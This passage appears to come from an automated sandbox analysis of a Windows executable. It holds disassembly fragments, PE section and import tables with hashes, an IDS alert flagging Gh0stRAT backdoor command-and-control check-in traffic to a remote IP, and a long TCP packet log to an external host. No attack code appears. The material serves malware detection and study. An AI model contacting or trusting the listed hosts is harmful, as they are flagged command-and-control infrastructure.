                                                                                                              add esp, 20h
                                                                                                              pop ebx
                                                                                                              dec eax
                                                                                                              jmp dword ptr [0000A6BCh]
                                                                                                              dec eax
                                                                                                              mov dword ptr [esp+08h], ecx
                                                                                                              dec eax
                                                                                                              sub esp, 38h
                                                                                                              mov ecx, 00000017h
                                                                                                              call 00007F69D070A02Ch
                                                                                                              test eax, eax
                                                                                                              je 00007F69D0700AD9h
                                                                                                              mov ecx, 00000002h
                                                                                                              int 29h
                                                                                                              dec eax
                                                                                                              lea ecx, dword ptr [00014FF7h]
                                                                                                              call 00007F69D0700B7Fh
                                                                                                              dec eax
                                                                                                              mov eax, dword ptr [esp+38h]
                                                                                                              dec eax
                                                                                                              mov dword ptr [000150DEh], eax
                                                                                                              dec eax
                                                                                                              lea eax, dword ptr [esp+38h]
                                                                                                              Programming Language:
                                                                                                              • [C++] VS2015 UPD3.1 build 24215
                                                                                                              • [LNK] VS2015 UPD3.1 build 24215
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x17734 | 0x64 | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x1d76000 | 0x4abc | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x1d74000 | 0xcc0 | .pdata
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x1d7b000 | 0x630 | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x165d0 | 0x54 | .rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x16630 | 0x94 | .rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0xf000 | 0x2a8 | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0xd350 | 0xd400 | 8e41a9c5ed9a34feab50e2f6638c2d76 | False | 0.5641030365566038 | data | 6.363013225921282 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0xf000 | 0x904e | 0x9200 | 909112f6547c8c223b9d09d4e73580ce | False | 0.4260755565068493 | data | 4.707335187064855 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0x19000 | 0x1d5ac68 | 0x1d58200 | ab2455c660e8e10120efea481bddb2e9 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.pdata | 0x1d74000 | 0xcc0 | 0xe00 | f0027954b09b335b4fb4c14137971ffd | False | 0.44363839285714285 | data | 4.49612119040806 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.gfids | 0x1d75000 | 0xc4 | 0x200 | bdbf77d4bf01cbf4f15fd100a268f74c | False | 0.21875 | Matlab v4 mat-file (little endian) q, numeric, rows 10, columns 13, imaginary | 0.9798152519205301 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.rsrc | 0x1d76000 | 0x4abc | 0x4c00 | c3521f000215b739b35a6f6b2ba17189 | False | 0.9590357730263158 | data | 7.924423626369639 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x1d7b000 | 0x630 | 0x800 | 0c3c3adbfa1d7560de091d1d1029dad6 | False | 0.537109375 | data | 4.797113422033704 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_ICON | 0x1d76118 | 0x490d | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | English | United States | 0.9856692155499706
RT_RCDATA | 0x1d7aa28 | 0x7c | data | English | United States | 0.6370967741935484
RT_RCDATA | 0x1d7aaa4 | 0x2 | data | English | United States | 5.0
RT_GROUP_ICON | 0x1d7aaa8 | 0x14 | data | English | United States | 1.05
DLL | Import
KERNEL32.dll | GetFileAttributesW, CloseHandle, GetLastError, WaitForSingleObject, GetExitCodeProcess, CreateProcessW, GetModuleFileNameW, LoadResource, LockResource, SizeofResource, LoadLibraryW, FindResourceW, CreateFileW, SetFilePointerEx, GetConsoleMode, GetConsoleCP, FlushFileBuffers, HeapReAlloc, HeapSize, GetProcessHeap, RtlCaptureContext, RtlLookupFunctionEntry, RtlVirtualUnwind, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetCurrentProcess, TerminateProcess, IsProcessorFeaturePresent, QueryPerformanceCounter, GetCurrentProcessId, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, IsDebuggerPresent, GetStartupInfoW, GetModuleHandleW, RtlUnwindEx, RtlPcToFileHeader, RaiseException, SetLastError, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, FreeLibrary, GetProcAddress, LoadLibraryExW, GetStdHandle, WriteFile, MultiByteToWideChar, WideCharToMultiByte, ExitProcess, GetModuleHandleExW, GetACP, HeapFree, HeapAlloc, FindClose, FindFirstFileExW, FindNextFileW, IsValidCodePage, GetOEMCP, GetCPInfo, GetCommandLineA, GetCommandLineW, GetEnvironmentStringsW, FreeEnvironmentStringsW, SetStdHandle, GetFileType, GetStringTypeW, LCMapStringW, VirtualAlloc
USER32.dll | wsprintfW, MessageBoxW
SHELL32.dll | ShellExecuteExW
SHLWAPI.dll | PathCombineW, PathRemoveFileSpecW, PathCanonicalizeW
Language of compilation system | Country where language is spoken | Map
English | United States
                                                                                                              TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                              2025-01-11T04:43:28.898619+01002852901ETPRO MALWARE Backdoor/Win.Gh0stRAT CnC Checkin1192.168.2.8499888.210.66.1838917TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                                                              Jan 11, 2025 04:42:21.372397900 CET49710443192.168.2.839.103.20.105
                                                                                                              Jan 11, 2025 04:42:21.372425079 CET4434971039.103.20.105192.168.2.8
                                                                                                              Jan 11, 2025 04:42:21.372483969 CET49710443192.168.2.839.103.20.105
                                                                                                              Jan 11, 2025 04:42:21.372876883 CET4434971039.103.20.105192.168.2.8
                                                                                                              Jan 11, 2025 04:42:21.372946024 CET49710443192.168.2.839.103.20.105
                                                                                                              Jan 11, 2025 04:42:21.372992992 CET4434971039.103.20.105192.168.2.8
                                                                                                              Jan 11, 2025 04:42:21.373064995 CET49710443192.168.2.839.103.20.105
                                                                                                              Jan 11, 2025 04:42:21.373095989 CET4434971039.103.20.105192.168.2.8
                                                                                                              Jan 11, 2025 04:42:21.373148918 CET49710443192.168.2.839.103.20.105
                                                                                                              Jan 11, 2025 04:42:21.373656034 CET4434971039.103.20.105192.168.2.8
                                                                                                              Jan 11, 2025 04:42:21.373763084 CET49710443192.168.2.839.103.20.105
                                                                                                              Jan 11, 2025 04:42:21.373871088 CET4434971039.103.20.105192.168.2.8
                                                                                                              Jan 11, 2025 04:42:21.373945951 CET49710443192.168.2.839.103.20.105
                                                                                                              Jan 11, 2025 04:42:21.374247074 CET4434971039.103.20.105192.168.2.8
                                                                                                              Jan 11, 2025 04:42:21.374315977 CET49710443192.168.2.839.103.20.105
                                                                                                              Jan 11, 2025 04:42:21.374337912 CET4434971039.103.20.105192.168.2.8
                                                                                                              Jan 11, 2025 04:42:21.374399900 CET49710443192.168.2.839.103.20.105
                                                                                                              Jan 11, 2025 04:42:21.376826048 CET4434971039.103.20.105192.168.2.8
                                                                                                              Jan 11, 2025 04:42:21.376900911 CET49710443192.168.2.839.103.20.105
                                                                                                              Jan 11, 2025 04:42:21.378398895 CET4434971039.103.20.105192.168.2.8
                                                                                                              Jan 11, 2025 04:42:21.378465891 CET49710443192.168.2.839.103.20.105
                                                                                                              Jan 11, 2025 04:42:21.379076004 CET4434971039.103.20.105192.168.2.8
                                                                                                              Jan 11, 2025 04:42:21.379144907 CET49710443192.168.2.839.103.20.105
                                                                                                              Jan 11, 2025 04:42:21.422578096 CET4434971039.103.20.105192.168.2.8
                                                                                                              Jan 11, 2025 04:42:21.422700882 CET49710443192.168.2.839.103.20.105
                                                                                                              Jan 11, 2025 04:42:21.459880114 CET4434971039.103.20.105192.168.2.8
                                                                                                              Jan 11, 2025 04:42:21.460021019 CET4434971039.103.20.105192.168.2.8
                                                                                                              Jan 11, 2025 04:42:21.460052967 CET49710443192.168.2.839.103.20.105
                                                                                                              Jan 11, 2025 04:42:21.460082054 CET4434971039.103.20.105192.168.2.8
                                                                                                              Jan 11, 2025 04:42:21.460144043 CET49710443192.168.2.839.103.20.105
                                                                                                              Jan 11, 2025 04:42:21.460190058 CET4434971039.103.20.105192.168.2.8
                                                                                                              Jan 11, 2025 04:42:21.460268974 CET49710443192.168.2.839.103.20.105
                                                                                                              Jan 11, 2025 04:42:21.460381031 CET49710443192.168.2.839.103.20.105
                                                                                                              Jan 11, 2025 04:42:21.461568117 CET49710443192.168.2.839.103.20.105
                                                                                                              Jan 11, 2025 04:42:21.461601973 CET4434971039.103.20.105192.168.2.8
                                                                                                              Jan 11, 2025 04:42:21.512113094 CET49711443192.168.2.839.103.20.105
                                                                                                              Jan 11, 2025 04:42:21.512157917 CET4434971139.103.20.105192.168.2.8
                                                                                                              Jan 11, 2025 04:42:21.512244940 CET49711443192.168.2.839.103.20.105
                                                                                                              Jan 11, 2025 04:42:21.512515068 CET49711443192.168.2.839.103.20.105
                                                                                                              Jan 11, 2025 04:42:21.512531996 CET4434971139.103.20.105192.168.2.8
                                                                                                              Jan 11, 2025 04:42:22.733951092 CET4434971139.103.20.105192.168.2.8
                                                                                                              Jan 11, 2025 04:42:22.734144926 CET49711443192.168.2.839.103.20.105
                                                                                                              Jan 11, 2025 04:42:22.735188961 CET49711443192.168.2.839.103.20.105
                                                                                                              Jan 11, 2025 04:42:22.735196114 CET4434971139.103.20.105192.168.2.8
                                                                                                              Jan 11, 2025 04:42:22.735507011 CET49711443192.168.2.839.103.20.105
                                                                                                              Jan 11, 2025 04:42:22.735512972 CET4434971139.103.20.105192.168.2.8
                                                                                                              Jan 11, 2025 04:42:23.063694954 CET4434971139.103.20.105192.168.2.8
                                                                                                              Jan 11, 2025 04:42:23.063760042 CET4434971139.103.20.105192.168.2.8
                                                                                                              Jan 11, 2025 04:42:23.063771009 CET49711443192.168.2.839.103.20.105
                                                                                                              Jan 11, 2025 04:42:23.063791990 CET4434971139.103.20.105192.168.2.8
                                                                                                              Jan 11, 2025 04:42:23.063821077 CET49711443192.168.2.839.103.20.105
                                                                                                              Jan 11, 2025 04:42:23.063862085 CET49711443192.168.2.839.103.20.105
                                                                                                              Jan 11, 2025 04:42:23.064059019 CET4434971139.103.20.105192.168.2.8
                                                                                                              Jan 11, 2025 04:42:23.064125061 CET49711443192.168.2.839.103.20.105
                                                                                                              Jan 11, 2025 04:42:23.064878941 CET4434971139.103.20.105192.168.2.8
                                                                                                              Jan 11, 2025 04:42:23.064949989 CET49711443192.168.2.839.103.20.105
                                                                                                              Jan 11, 2025 04:42:23.064959049 CET4434971139.103.20.105192.168.2.8
                                                                                                              Jan 11, 2025 04:42:23.065005064 CET49711443192.168.2.839.103.20.105
                                                                                                              Jan 11, 2025 04:42:23.065036058 CET4434971139.103.20.105192.168.2.8
                                                                                                              Jan 11, 2025 04:42:23.065089941 CET49711443192.168.2.839.103.20.105
                                                                                                              Jan 11, 2025 04:42:23.065114021 CET49711443192.168.2.839.103.20.105
                                                                                                              Jan 11, 2025 04:42:23.065133095 CET4434971139.103.20.105192.168.2.8
                                                                                                              Jan 11, 2025 04:42:23.065164089 CET49711443192.168.2.839.103.20.105
                                                                                                              Jan 11, 2025 04:42:23.065181971 CET49711443192.168.2.839.103.20.105
                                                                                                              Jan 11, 2025 04:42:23.078811884 CET49712443192.168.2.839.103.20.105
                                                                                                              Jan 11, 2025 04:42:23.078859091 CET4434971239.103.20.105192.168.2.8
                                                                                                              Jan 11, 2025 04:42:23.078943014 CET49712443192.168.2.839.103.20.105
                                                                                                              Jan 11, 2025 04:42:23.079174042 CET49712443192.168.2.839.103.20.105
                                                                                                              Jan 11, 2025 04:42:23.079193115 CET4434971239.103.20.105192.168.2.8
                                                                                                              Jan 11, 2025 04:42:24.330408096 CET4434971239.103.20.105192.168.2.8
                                                                                                              Jan 11, 2025 04:42:24.330490112 CET49712443192.168.2.839.103.20.105
                                                                                                              Jan 11, 2025 04:42:24.331048012 CET49712443192.168.2.839.103.20.105
                                                                                                              Jan 11, 2025 04:42:24.331057072 CET4434971239.103.20.105192.168.2.8
                                                                                                              Jan 11, 2025 04:42:24.331325054 CET49712443192.168.2.839.103.20.105
                                                                                                              Jan 11, 2025 04:42:24.331331968 CET4434971239.103.20.105192.168.2.8
                                                                                                              Jan 11, 2025 04:42:24.683217049 CET4434971239.103.20.105192.168.2.8
                                                                                                              Jan 11, 2025 04:42:24.683278084 CET4434971239.103.20.105192.168.2.8
                                                                                                              Jan 11, 2025 04:42:24.683372021 CET49712443192.168.2.839.103.20.105
                                                                                                              Jan 11, 2025 04:42:24.683387995 CET4434971239.103.20.105192.168.2.8
                                                                                                              Jan 11, 2025 04:42:24.683420897 CET49712443192.168.2.839.103.20.105
                                                                                                              Jan 11, 2025 04:42:24.683448076 CET49712443192.168.2.839.103.20.105
                                                                                                              Jan 11, 2025 04:42:24.683511019 CET4434971239.103.20.105192.168.2.8
                                                                                                              Jan 11, 2025 04:42:24.683666945 CET49712443192.168.2.839.103.20.105
                                                                                                              Jan 11, 2025 04:42:24.683675051 CET4434971239.103.20.105192.168.2.8
                                                                                                              Jan 11, 2025 04:42:24.683705091 CET4434971239.103.20.105192.168.2.8
                                                                                                              Jan 11, 2025 04:42:24.683744907 CET49712443192.168.2.839.103.20.105
                                                                                                              Jan 11, 2025 04:42:24.683765888 CET49712443192.168.2.839.103.20.105
                                                                                                              Jan 11, 2025 04:42:24.908565998 CET4434971239.103.20.105192.168.2.8
                                                                                                              Jan 11, 2025 04:42:24.908795118 CET49712443192.168.2.839.103.20.105
                                                                                                              Jan 11, 2025 04:42:24.908950090 CET4434971239.103.20.105192.168.2.8
                                                                                                              Jan 11, 2025 04:42:24.909070969 CET49712443192.168.2.839.103.20.105
                                                                                                              Jan 11, 2025 04:42:24.909390926 CET4434971239.103.20.105192.168.2.8
                                                                                                              Jan 11, 2025 04:42:24.909470081 CET49712443192.168.2.839.103.20.105
                                                                                                              Jan 11, 2025 04:42:24.910342932 CET4434971239.103.20.105192.168.2.8
                                                                                                              Jan 11, 2025 04:42:24.910432100 CET4434971239.103.20.105192.168.2.8
                                                                                                              Jan 11, 2025 04:42:24.910494089 CET49712443192.168.2.839.103.20.105
                                                                                                              Jan 11, 2025 04:42:24.910494089 CET49712443192.168.2.839.103.20.105
                                                                                                              Jan 11, 2025 04:42:24.910511971 CET4434971239.103.20.105192.168.2.8
                                                                                                              Jan 11, 2025 04:42:24.910617113 CET49712443192.168.2.839.103.20.105
                                                                                                              Jan 11, 2025 04:42:24.911227942 CET4434971239.103.20.105192.168.2.8
                                                                                                              Jan 11, 2025 04:42:24.911341906 CET49712443192.168.2.839.103.20.105
                                                                                                              Jan 11, 2025 04:42:24.911948919 CET4434971239.103.20.105192.168.2.8
                                                                                                              Jan 11, 2025 04:42:24.912060976 CET49712443192.168.2.839.103.20.105
                                                                                                              Jan 11, 2025 04:42:25.143282890 CET4434971239.103.20.105192.168.2.8
                                                                                                              Jan 11, 2025 04:42:25.143474102 CET49712443192.168.2.839.103.20.105
                                                                                                              Jan 11, 2025 04:42:25.143523932 CET4434971239.103.20.105192.168.2.8
                                                                                                              Jan 11, 2025 04:42:25.143635988 CET49712443192.168.2.839.103.20.105
                                                                                                              Jan 11, 2025 04:42:25.143903971 CET4434971239.103.20.105192.168.2.8
                                                                                                              Jan 11, 2025 04:42:25.143987894 CET49712443192.168.2.839.103.20.105
                                                                                                              Jan 11, 2025 04:42:25.144031048 CET4434971239.103.20.105192.168.2.8
                                                                                                              Jan 11, 2025 04:42:25.144105911 CET49712443192.168.2.839.103.20.105
                                                                                                              Jan 11, 2025 04:42:25.144617081 CET4434971239.103.20.105192.168.2.8
                                                                                                              Jan 11, 2025 04:42:25.144690990 CET49712443192.168.2.839.103.20.105
                                                                                                              Jan 11, 2025 04:42:25.144820929 CET4434971239.103.20.105192.168.2.8
                                                                                                              Jan 11, 2025 04:42:25.144876003 CET4434971239.103.20.105192.168.2.8
                                                                                                              Jan 11, 2025 04:42:25.144890070 CET49712443192.168.2.839.103.20.105
                                                                                                              Jan 11, 2025 04:42:25.144901991 CET4434971239.103.20.105192.168.2.8
                                                                                                              Jan 11, 2025 04:42:25.144932985 CET49712443192.168.2.839.103.20.105
                                                                                                              Jan 11, 2025 04:42:25.144989014 CET49712443192.168.2.839.103.20.105
                                                                                                              Jan 11, 2025 04:42:25.145725012 CET4434971239.103.20.105192.168.2.8
                                                                                                              Jan 11, 2025 04:42:25.145776987 CET4434971239.103.20.105192.168.2.8
                                                                                                              Jan 11, 2025 04:42:25.145814896 CET49712443192.168.2.839.103.20.105
                                                                                                              Jan 11, 2025 04:42:25.145823956 CET4434971239.103.20.105192.168.2.8
                                                                                                              Jan 11, 2025 04:42:25.145864964 CET49712443192.168.2.839.103.20.105
                                                                                                              Jan 11, 2025 04:42:25.145893097 CET49712443192.168.2.839.103.20.105
                                                                                                              Jan 11, 2025 04:42:25.146478891 CET4434971239.103.20.105192.168.2.8
                                                                                                              Jan 11, 2025 04:42:25.146552086 CET49712443192.168.2.839.103.20.105
                                                                                                              Jan 11, 2025 04:42:25.146564960 CET4434971239.103.20.105192.168.2.8
                                                                                                              Jan 11, 2025 04:42:25.146581888 CET4434971239.103.20.105192.168.2.8
                                                                                                              Jan 11, 2025 04:42:25.146641016 CET49712443192.168.2.839.103.20.105
                                                                                                              Jan 11, 2025 04:42:25.146668911 CET49712443192.168.2.839.103.20.105
                                                                                                              Jan 11, 2025 04:42:25.147347927 CET4434971239.103.20.105192.168.2.8
                                                                                                              Jan 11, 2025 04:42:25.147423983 CET49712443192.168.2.839.103.20.105
                                                                                                              Jan 11, 2025 04:42:25.147553921 CET4434971239.103.20.105192.168.2.8
                                                                                                              Jan 11, 2025 04:42:25.147607088 CET4434971239.103.20.105192.168.2.8
                                                                                                              Jan 11, 2025 04:42:25.147623062 CET49712443192.168.2.839.103.20.105
                                                                                                              Jan 11, 2025 04:42:25.147630930 CET4434971239.103.20.105192.168.2.8
                                                                                                              Jan 11, 2025 04:42:25.147665024 CET49712443192.168.2.839.103.20.105
                                                                                                              Jan 11, 2025 04:42:25.147692919 CET49712443192.168.2.839.103.20.105
                                                                                                              Jan 11, 2025 04:42:25.364167929 CET4434971239.103.20.105192.168.2.8
                                                                                                              Jan 11, 2025 04:42:25.364248991 CET4434971239.103.20.105192.168.2.8
                                                                                                              Jan 11, 2025 04:42:25.364269972 CET49712443192.168.2.839.103.20.105
                                                                                                              Jan 11, 2025 04:42:25.364284992 CET4434971239.103.20.105192.168.2.8
                                                                                                              Jan 11, 2025 04:42:25.364298105 CET4434971239.103.20.105192.168.2.8
                                                                                                              Jan 11, 2025 04:42:25.364336967 CET49712443192.168.2.839.103.20.105
                                                                                                              Jan 11, 2025 04:42:25.364352942 CET4434971239.103.20.105192.168.2.8
                                                                                                              Jan 11, 2025 04:42:25.364362001 CET4434971239.103.20.105192.168.2.8
                                                                                                              Jan 11, 2025 04:42:25.364366055 CET49712443192.168.2.839.103.20.105
                                                                                                              Jan 11, 2025 04:42:25.364403009 CET49712443192.168.2.839.103.20.105
                                                                                                              Jan 11, 2025 04:42:25.364409924 CET4434971239.103.20.105192.168.2.8
                                                                                                              Jan 11, 2025 04:42:25.364439964 CET49712443192.168.2.839.103.20.105
                                                                                                              Jan 11, 2025 04:42:25.364505053 CET4434971239.103.20.105192.168.2.8
                                                                                                              Jan 11, 2025 04:42:25.364514112 CET49712443192.168.2.839.103.20.105
                                                                                                              Jan 11, 2025 04:42:25.364522934 CET4434971239.103.20.105192.168.2.8
                                                                                                              Jan 11, 2025 04:42:25.364554882 CET49712443192.168.2.839.103.20.105
                                                                                                              Jan 11, 2025 04:42:25.364571095 CET4434971239.103.20.105192.168.2.8
                                                                                                              Jan 11, 2025 04:42:25.821104050 CET49712443192.168.2.839.103.20.105
                                                                                                              Jan 11, 2025 04:42:25.821135998 CET4434971239.103.20.105192.168.2.8
                                                                                                              Jan 11, 2025 04:42:25.821197987 CET49712443192.168.2.839.103.20.105
                                                                                                              Jan 11, 2025 04:42:25.821228027 CET4434971239.103.20.105192.168.2.8
                                                                                                              Jan 11, 2025 04:42:25.821290016 CET49712443192.168.2.839.103.20.105
                                                                                                              Jan 11, 2025 04:42:25.821321964 CET4434971239.103.20.105192.168.2.8
                                                                                                              Jan 11, 2025 04:42:25.821382999 CET49712443192.168.2.839.103.20.105
                                                                                                              Jan 11, 2025 04:42:25.821413040 CET4434971239.103.20.105192.168.2.8
                                                                                                              Jan 11, 2025 04:42:25.821486950 CET49712443192.168.2.839.103.20.105
                                                                                                              Jan 11, 2025 04:42:25.821533918 CET4434971239.103.20.105192.168.2.8
                                                                                                              Jan 11, 2025 04:42:25.821599960 CET49712443192.168.2.839.103.20.105
                                                                                                              Jan 11, 2025 04:42:25.821640015 CET4434971239.103.20.105192.168.2.8
                                                                                                              Jan 11, 2025 04:42:25.821700096 CET49712443192.168.2.839.103.20.105
                                                                                                              Jan 11, 2025 04:42:25.821732044 CET4434971239.103.20.105192.168.2.8
                                                                                                              Jan 11, 2025 04:42:25.821790934 CET49712443192.168.2.839.103.20.105
                                                                                                              Jan 11, 2025 04:42:25.821830988 CET4434971239.103.20.105192.168.2.8
                                                                                                              Jan 11, 2025 04:42:25.821892977 CET49712443192.168.2.839.103.20.105
                                                                                                              Jan 11, 2025 04:42:25.821933031 CET4434971239.103.20.105192.168.2.8
                                                                                                              Jan 11, 2025 04:42:25.821993113 CET49712443192.168.2.839.103.20.105
                                                                                                              Jan 11, 2025 04:42:25.822029114 CET4434971239.103.20.105192.168.2.8
                                                                                                              Jan 11, 2025 04:42:25.822088957 CET49712443192.168.2.839.103.20.105
                                                                                                              Jan 11, 2025 04:42:25.822114944 CET4434971239.103.20.105192.168.2.8
                                                                                                              Jan 11, 2025 04:42:25.822175980 CET49712443192.168.2.839.103.20.105
                                                                                                              Jan 11, 2025 04:42:25.822199106 CET4434971239.103.20.105192.168.2.8
                                                                                                              Jan 11, 2025 04:42:25.822258949 CET49712443192.168.2.839.103.20.105
                                                                                                              Jan 11, 2025 04:42:25.822324991 CET4434971239.103.20.105192.168.2.8
                                                                                                              Jan 11, 2025 04:42:25.822391033 CET49712443192.168.2.839.103.20.105
                                                                                                              Jan 11, 2025 04:42:25.822412014 CET4434971239.103.20.105192.168.2.8
                                                                                                              Jan 11, 2025 04:42:25.822474957 CET49712443192.168.2.839.103.20.105
                                                                                                              Jan 11, 2025 04:42:25.822525978 CET4434971239.103.20.105192.168.2.8
                                                                                                              Jan 11, 2025 04:42:25.822617054 CET49712443192.168.2.839.103.20.105
                                                                                                              Jan 11, 2025 04:42:25.822618961 CET4434971239.103.20.105192.168.2.8
                                                                                                              Jan 11, 2025 04:42:25.822643042 CET4434971239.103.20.105192.168.2.8
                                                                                                              Jan 11, 2025 04:42:25.822675943 CET49712443192.168.2.839.103.20.105
                                                                                                              Jan 11, 2025 04:42:25.822702885 CET49712443192.168.2.839.103.20.105
                                                                                                              Jan 11, 2025 04:42:25.822736979 CET4434971239.103.20.105192.168.2.8
                                                                                                              Jan 11, 2025 04:42:25.822802067 CET49712443192.168.2.839.103.20.105
                                                                                                              Jan 11, 2025 04:42:25.822829008 CET4434971239.103.20.105192.168.2.8
                                                                                                              Jan 11, 2025 04:42:25.822887897 CET49712443192.168.2.839.103.20.105
                                                                                                              Jan 11, 2025 04:42:25.822918892 CET4434971239.103.20.105192.168.2.8
                                                                                                              Jan 11, 2025 04:42:25.822974920 CET49712443192.168.2.839.103.20.105
                                                                                                              Jan 11, 2025 04:42:25.908461094 CET4434971239.103.20.105192.168.2.8
                                                                                                              Jan 11, 2025 04:42:25.908566952 CET49712443192.168.2.839.103.20.105
                                                                                                              Jan 11, 2025 04:42:25.908586979 CET4434971239.103.20.105192.168.2.8
                                                                                                              Jan 11, 2025 04:42:25.908657074 CET49712443192.168.2.839.103.20.105
                                                                                                              Jan 11, 2025 04:42:25.908746004 CET4434971239.103.20.105192.168.2.8
                                                                                                              Jan 11, 2025 04:42:25.908807039 CET49712443192.168.2.839.103.20.105
                                                                                                              Jan 11, 2025 04:42:25.908860922 CET4434971239.103.20.105192.168.2.8
                                                                                                              Jan 11, 2025 04:42:25.908920050 CET49712443192.168.2.839.103.20.105
                                                                                                              Jan 11, 2025 04:42:25.908977985 CET4434971239.103.20.105192.168.2.8
                                                                                                              Jan 11, 2025 04:42:25.909038067 CET49712443192.168.2.839.103.20.105
                                                                                                              Jan 11, 2025 04:42:25.909073114 CET4434971239.103.20.105192.168.2.8
                                                                                                              Jan 11, 2025 04:42:25.909127951 CET49712443192.168.2.839.103.20.105
                                                                                                              Jan 11, 2025 04:42:25.909166098 CET4434971239.103.20.105192.168.2.8
                                                                                                              Jan 11, 2025 04:42:25.909224987 CET49712443192.168.2.839.103.20.105
                                                                                                              Jan 11, 2025 04:42:25.909295082 CET4434971239.103.20.105192.168.2.8
                                                                                                              Jan 11, 2025 04:42:25.909359932 CET49712443192.168.2.839.103.20.105
                                                                                                              Jan 11, 2025 04:42:25.909389019 CET4434971239.103.20.105192.168.2.8
                                                                                                              Jan 11, 2025 04:42:25.909456015 CET49712443192.168.2.839.103.20.105
                                                                                                              Jan 11, 2025 04:42:25.909487009 CET4434971239.103.20.105192.168.2.8
                                                                                                              Jan 11, 2025 04:42:25.909549952 CET49712443192.168.2.839.103.20.105
                                                                                                              Jan 11, 2025 04:42:25.909581900 CET4434971239.103.20.105192.168.2.8
                                                                                                              Jan 11, 2025 04:42:25.909641981 CET49712443192.168.2.839.103.20.105
                                                                                                              Jan 11, 2025 04:42:25.909717083 CET4434971239.103.20.105192.168.2.8
                                                                                                              Jan 11, 2025 04:42:25.909779072 CET49712443192.168.2.839.103.20.105
                                                                                                              Jan 11, 2025 04:42:25.909806013 CET4434971239.103.20.105192.168.2.8
                                                                                                              Jan 11, 2025 04:42:25.909883022 CET49712443192.168.2.839.103.20.105
                                                                                                              Jan 11, 2025 04:42:25.909898043 CET4434971239.103.20.105192.168.2.8
                                                                                                              Jan 11, 2025 04:42:25.909991026 CET49712443192.168.2.839.103.20.105
                                                                                                              Jan 11, 2025 04:42:25.909997940 CET4434971239.103.20.105192.168.2.8
                                                                                                              Jan 11, 2025 04:42:25.910026073 CET4434971239.103.20.105192.168.2.8
                                                                                                              Jan 11, 2025 04:42:25.910056114 CET49712443192.168.2.839.103.20.105
                                                                                                              Jan 11, 2025 04:42:25.910089016 CET49712443192.168.2.839.103.20.105
                                                                                                              Jan 11, 2025 04:42:25.910135984 CET4434971239.103.20.105192.168.2.8
                                                                                                              Jan 11, 2025 04:42:25.910197020 CET49712443192.168.2.839.103.20.105
                                                                                                              Jan 11, 2025 04:42:25.910228968 CET4434971239.103.20.105192.168.2.8
                                                                                                              Jan 11, 2025 04:42:25.910298109 CET49712443192.168.2.839.103.20.105
                                                                                                              Jan 11, 2025 04:42:25.910321951 CET4434971239.103.20.105192.168.2.8
                                                                                                              Jan 11, 2025 04:42:25.910384893 CET49712443192.168.2.839.103.20.105
                                                                                                              Jan 11, 2025 04:42:25.910459042 CET4434971239.103.20.105192.168.2.8
                                                                                                              Jan 11, 2025 04:42:25.910522938 CET49712443192.168.2.839.103.20.105
                                                                                                              Jan 11, 2025 04:42:25.910620928 CET4434971239.103.20.105192.168.2.8
                                                                                                              Jan 11, 2025 04:42:25.910684109 CET49712443192.168.2.839.103.20.105
                                                                                                              Jan 11, 2025 04:42:25.910712004 CET4434971239.103.20.105192.168.2.8
                                                                                                              Jan 11, 2025 04:42:25.910773993 CET49712443192.168.2.839.103.20.105
                                                                                                              Jan 11, 2025 04:42:25.910805941 CET4434971239.103.20.105192.168.2.8
                                                                                                              Jan 11, 2025 04:42:25.910860062 CET49712443192.168.2.839.103.20.105
                                                                                                              Jan 11, 2025 04:42:25.910934925 CET4434971239.103.20.105192.168.2.8
                                                                                                              Jan 11, 2025 04:42:25.911000013 CET49712443192.168.2.839.103.20.105
                                                                                                              Jan 11, 2025 04:42:25.911026001 CET4434971239.103.20.105192.168.2.8
                                                                                                              Jan 11, 2025 04:42:25.911087990 CET49712443192.168.2.839.103.20.105
                                                                                                              Jan 11, 2025 04:42:25.911114931 CET4434971239.103.20.105192.168.2.8
                                                                                                              Jan 11, 2025 04:42:25.911200047 CET4434971239.103.20.105192.168.2.8
                                                                                                              Jan 11, 2025 04:42:25.911242008 CET49712443192.168.2.839.103.20.105
